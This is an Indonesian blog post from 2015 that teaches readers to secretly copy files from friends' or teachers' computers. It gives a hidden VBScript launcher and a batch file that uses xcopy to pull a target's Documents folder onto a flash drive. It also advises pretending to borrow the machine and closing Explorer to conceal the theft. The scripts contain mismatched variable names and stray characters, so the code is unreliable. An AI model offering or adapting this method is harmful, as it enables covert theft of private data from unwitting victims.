Sunday, December 6, 2015

Cara mencuri data dengan hanya mengetahui nama komputer dan users target

Hack data dengan hanya mengetahui nama komputer dan users target

Siapa yang tidak senang dikatakan hacker?
Anda akan saya kasih tahu sebuah trik yaitu mencuri alias membajak data orang, teman, maupun data-data guru di sekolah tanpa sepengetahuan korban pencurian.


Untuk melakukan hal ini Anda tentunya perlu menyiapkan Flashdisk dan sesuaikan kapasitas flashdisk dengan ukuran file yang anda bajak. Misalnya, kapasitas file yang akan anda bajak 1 GB Sementara kapasitas flashdisk anda hanya 512 MB Tentunya tidak semua file  yang anda bajak bisa anda proleh.
Terlebih dahulu persiapkan senjata anda yaitu Flasdisk
  • Hal pertama yang anda harus lakukan adalah membuka notepad sebagai tempat untuk mengetikkan script berikut ini. (Tanpa tanda petik)
''dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshell.expandenvironmentstrings("%comspec%")
wshsell.run (dos & " /c datacopy.bat"), vbhide''







Setelah selsai mengetikkan script di atas, simpan file tersebut di flashdisk anda dengan nama ''data.vbs'' pada saat menyimpan data.vbs,  dalam kotak dialog save as, pastikan anda All files. Barulah anda bisa menyimpan dengan menekan tombol Save.

  • Selanjutnya sekarang kita akan membuat file yang kedua, bukalah halaman notepad yang baru, dan ketik lagi script berikut ini. (Tanpa warna)
@echo off
"mkdir %computername%
xcopy "D:\Gambarku\*.*" %computername% /s/c/q/r
@cls
Qexit"

Baca penjelasan berikut (Penting)
  1. Perintah mkdir akan membuat sebuah folder sebagai tempat untuk menaruh file hasil bajakan. Nama folder ini akan dibuat secara otomatis sesuai dengan nama komputer target
  2. Perintah xcopy "D:\Folderku\*.*" %computername% /s/c/q/r hal ini berarti kita akan membajak data yang tersimpan dalam drive "D:" Foldernya adalah ''Gambarku" dan kode *.* artinya anda akan membajak semua jenis file di dalam folder "Gambarku". jika anda hanya ingin mengambil jenis file document (DOC) Maka anda bisa mengganti *.* dengan *doc.
  3. computername adalah nama komputer target.
  4. Simpan dulu script tersebut dengan nama datacopy.bat
Seperti judul  artikel ini menbajak data dengan hanya mengetahui nama komputer dan users target yang saya maksud adalah merubah script di atas yang berisikan "D:\Gambarku\ menjadi "C:\Users\nama-user\Documents\*.*" %computername% /s /c/q/r (Anda akan membajak Folder Documents)
Semua komputer punya C:\Users\ dan \Documents\ jadi yang pasti anda ubah adalah nama users dan komputer target.
Misalnya: Nama users komputer saya Effendi dan nama komputer saya  ASUS, jadi anda harus menulis dan menyimpan script tersebut dengan:
keseimpulannya anda harus mengetahui letak file, nama komputer dan users korban bajakan anda.

@echo off
"mkdir %computername%
xcopy "C:\Users\Effendi\Documents\*.*" %ASUS% /s/c/q/r
@cls
Qexit"

Menajalankan Aksi
Setelah anda membuat kedua file diatas, masing-masing nama file tersebut adalah "datacopy.bat" dan "data.vbs" tempatkan kedua file yang telah anda buat tersebut pada folder yang sama di dalam Flashdisk.

  








Untuk memulai aksi pembajakan data, lakukan akting terlebih dahulu misalnya mau pinjam buat lihat isi flashdisk, pinjam buat edit data dokumen di flashdisk dan yang lainya. setelah itu jalankan "datacopy.bat" maka dengan sendirinya akan terbuka CMD.
Artinya sedang mengcopy data yang anda incar dan data tersebut akan tersalin kedalam flashdisk anda
  • Semakin besar kapasitas file yang anda salin maka semakin lama pula proses penyalinan data
  • Untuk menyembunyikan diri bahwa anda sedang membajak data, ketika anda menjalankan datacopy.bat, sebaiknya anda langsung menutup Exploler dengan menekan tanda silang di pojok atas komputer
Jika aksi berhasil maka akan seperti gambar dibawah ini:


Trik diatas sudah dapat anda terapkan dirumah, selain itu agar data-data yang anda bajak dapat ter hiden (Tersembunyi) Secara otomatis anda bisa membaca artikelnya disini


Load disqus comments

3 comments